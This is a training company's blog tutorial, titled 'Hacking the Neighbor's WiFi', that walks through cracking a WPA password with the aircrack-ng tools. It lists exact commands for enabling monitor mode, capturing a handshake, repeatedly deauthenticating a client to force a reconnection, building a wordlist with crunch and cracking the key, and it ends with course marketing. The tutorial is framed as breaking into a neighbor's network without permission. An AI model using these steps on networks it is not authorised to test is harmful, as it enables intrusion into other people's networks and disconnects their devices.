fbpx

Hacking the Neighbor’s WiFi: Wireless password Cracking

A VPN is an essential component of IT security, whether you’re just starting a business or are already up and running. Most business interactions and transactions happen online and VPN

The following blog illustrates Wireless password cracking. The demonstration video is attached in the end. We will learn how to Hack into neighbor’s WiFi. You need the following prerequisites for successfully executing the task:

Pre-Requisites:

  • -Kali Linux
  • -Router
  • -Laptop connected to that router
  • -Wireless adaptor that supports monitor mode

Here we use Alfa AWUS036NHA adapter which is compatible with Kali Linux. Monitor mode allows the card to listen to the packets. It captures the handshake. Check if the system is reading the WiFi card.

iwconfing

Step 1: Kill all the running processes

To kill the running processes we use the following command:

airmon-ng check kill

Step 2: Enable Monitor Mode

The following command is used to enable the monitor mode. This mode is used to intercept and listen to the packets.

airmon-ng start wlan0

wlan0 is the interface

Step 3: Scan the networks in the surrounding

As the card is in monitor mode now, we need to capture the packets in the surrounding. We use the following command:

airodump-ng

This command scans the available networks in the surrounding and lists critical information like the BSSID, ESSID, Beacons, Power and Channel Number.

Step 4: Capture the packets on a specific network

airodump-ng –c9 --bssid 70:4F:57:21:49:86  --w capture wlan0mon
  • –c9 – Channel number
  • 70:4F:57:21:49:86 – BSSID of the AP
  • –w – To write the captured packets to a file.
  • capture –File where captured packets are written,
  • wlan0mon – Interface

We wait for it to capture the handshake.

Step 5: Capture the WPA handshake

We see that it has captured the 4-way handshake between a device and a router. Sometimes, deAuth needs to be used to capture the handshake by kicking off a client so that it reconnects again. We can perform it by the use of following command:

aireplay-ng -0 1 –a 70:4F:57:21:49:86   -c <Channel no. of the client>

This command performs the deAuth attack once. You may have to perform it multiple times. It is recommended not to use the same client in every attack.

Step 6: Generate a password list

Once the handshake captured is done, the process of capturing packets is stopped. Now we see the captured packets and find a file 01.cap with “.cap” extension.

Password list can either be found online as we have taken from GitHub or it can be created using the following command which gives all permutation if letters are known.

crunch 0 9 abcd1234 –o abcd.txt
  • 9- Maximum length of the password
  • abcd1234- Character set
  • abcd.txt- File where all the permutations of given character set is saved.

Step 7: Crack the password

Finally, use the following command to crack the password

aircrack-ng –w pswdlist –b 70:4F:57:21:49:86  capture 01.cap

It will take some time to go through the list and will give you the password. Congratulations!

You can watch the detailed video demonstration here:

About Cybervie

Cybervie provides best cyber security training program in hyderabad, India.This cyber security course enables you to detect vulnerablities of a system, wardoff attacks and manage emergency situations. Taking a proactive approach to security that can help organisations to protect their data, Cybervie has designed its training module based on the cyber security industry requirements with three levels of training in both offensive and defensive manner, and use real time scenarios which can help our students to understand the market up-to its standard certification which is an add on advantage for our students to stand out of competition in an cyber security interview.

More Info – Click Here

Share on facebook
Share on twitter
Share on linkedin
Share on whatsapp

Recent Posts

Follow Us on Youtube

Cyber Security Training Program 2020

Cyber security Course offered by Cybervie prepares students for a path of success in a highly demanding and rapidly growing field of cyber security. The course is completely designed with an adaptable mindset, where the program allows the student to complete the course work at their own pace while being able to complete weekly assignments. Hence, also making it convenient for busy working professionals to pursue the training to help them advance their career in cyber security.

Cybervie has designed the training module based on the cyber security industry requirements in both offensive and defensive manner, using real time scenarios which help our students to understand the market standards.

Sign up for our Newsletter

Interested in Cyber Security Training Program 2020 – Click Here

Short Logo

Thank You!

We will Schedule a Program Demo & Invite to Given Mail Id in 24 Hours.

Meanwhile you can Download Brochure to Know More about the Program.

Short Logo

We’re here to help.

2020 Cyber Security Training Program.

Short Logo

Hurry You Won!

You are Eligible for the Scholarship on 2020 Cyber Security Training Program.

We will Schedule a Program Demo & Invite you to the Given Mail Id in 24 Hours.

Short Logo

We’re here to help.

Avail Scholarship
On 2020 Cyber Security Training Program.